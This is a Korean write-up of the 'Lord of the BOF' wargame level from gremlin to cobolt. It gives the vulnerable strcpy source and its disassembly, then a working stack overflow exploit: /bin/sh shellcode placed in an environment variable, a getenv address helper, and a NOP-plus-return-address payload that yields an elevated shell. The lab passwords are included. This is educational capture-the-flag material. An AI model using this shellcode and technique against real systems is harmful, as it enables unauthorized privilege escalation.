[LOB] gremlin -> cobolt

gate는 패스ㅠㅠ

id : gremlin

pw : hello bof world

# coblot 소스 

[gremlin@localhost gremlin]$ cat cobolt.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - cobolt

        - small buffer

*/

int main(int argc, char *argv[])

{

    char buffer[16];

    if(argc < 2){

        printf("argv error\n");

        exit(0);

    }

    strcpy(buffer, argv[1]);

    printf("%s\n", buffer);

}

[gremlin@localhost gremlin]$

gate와 다르게 buffer의 크기가 16으로 줄어들었다.

# cobolt 디스어셈블링 

(gdb) disas main

Dump of assembler code for function main:

0x8048430 <main>: push   %ebp

0x8048431 <main+1>: mov    %esp,%ebp

0x8048433 <main+3>: sub    $0x10,%esp

0x8048436 <main+6>: cmpl   $0x1,0x8(%ebp)

0x804843a <main+10>: jg     0x8048453 <main+35>

0x804843c <main+12>: push   $0x80484d0

0x8048441 <main+17>: call   0x8048350 <printf>

0x8048446 <main+22>: add    $0x4,%esp

0x8048449 <main+25>: push   $0x0

0x804844b <main+27>: call   0x8048360 <exit>

0x8048450 <main+32>: add    $0x4,%esp

0x8048453 <main+35>: mov    0xc(%ebp),%eax

0x8048456 <main+38>: add    $0x4,%eax

0x8048459 <main+41>: mov    (%eax),%edx

0x804845b <main+43>: push   %edx

0x804845c <main+44>: lea    0xfffffff0(%ebp),%eax

0x804845f <main+47>: push   %eax

0x8048460 <main+48>: call   0x8048370 <strcpy>

0x8048465 <main+53>: add    $0x8,%esp

0x8048468 <main+56>: lea    0xfffffff0(%ebp),%eax

0x804846b <main+59>: push   %eax

0x804846c <main+60>: push   $0x80484dc

0x8048471 <main+65>: call   0x8048350 <printf>

0x8048476 <main+70>: add    $0x8,%esp

0x8048479 <main+73>: leave

0x804847a <main+74>: ret

0x804847b <main+75>: nop

0x804847c <main+76>: nop

0x804847d <main+77>: nop

0x804847e <main+78>: nop

0x804847f <main+79>: nop

End of assembler dump.

메모리는 0x10 = 16 바이트로 할당

RET[4]

SFP[4]

Buffer[16]

-SHELLCODE를 넣어준 후 env(환경변수 목록 출력) 명령어를 통해 보면 다음과 같이 SHELLCODE가 잘 들어갔다.

[gremlin@localhost gremlin]$ export SHELLCODE=`python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

[gremlin@localhost gremlin]$ env

PWD=/home/gremlin

REMOTEHOST=192.168.75.1

HOSTNAME=localhost.localdomain

LESSOPEN=|/usr/bin/lesspipe.sh %s

USER=gremlin

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:

MACHTYPE=i386-redhat-linux-gnu

MAIL=/var/spool/mail/gremlin

INPUTRC=/etc/inputrc

SHELLCODE=1󿿐h//shh/bin⏓ኂ°

                         ̀

BASH_ENV=/home/gremlin/.bashrc

LANG=en_US

DISPLAY=192.168.75.1:0.0

LOGNAME=gremlin

SHLVL=2

USERNAME=

SHELL=/bin/bash

HOSTTYPE=i386

HISTSIZE=1000

OSTYPE=linux-gnu

TERM=xterm

HOME=/home/gremlin

PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gremlin/bin

_=/usr/bin/env

-환경변수에 등록된 SHELLCODE의 주소값을 알아보기 위한 소스를 짠다.

# getenv.c

#include<stdio.h>

int main(void) {

        printf("%p\n" ,getenv("SHELLCODE"));

        return 0;

}

-컴파일 후 실행하면 주소값이 뜬다.

[gremlin@localhost gremlin]$ gcc -o getenv getenv.c

[gremlin@localhost gremlin]$ ./getenv

0xbffffecb

-Buffer와 SFP에 nop를 채워주고 RET에 들어갈 주소값 4바이트를 넣어준다.

./cobolt `python -c 'print "\x90"*20+"\xcb\xfe\xff\xbf"'`

[gremlin@localhost gremlin]$ ./getenv

0xbffffecb

[gremlin@localhost gremlin]$ ./cobolt `python -c 'print "\x90"*20+"\xcb\xfe\xff\xbf"'`

?y¿

bash$ id

uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)

bash$ my-pass

euid = 502

hacking exposed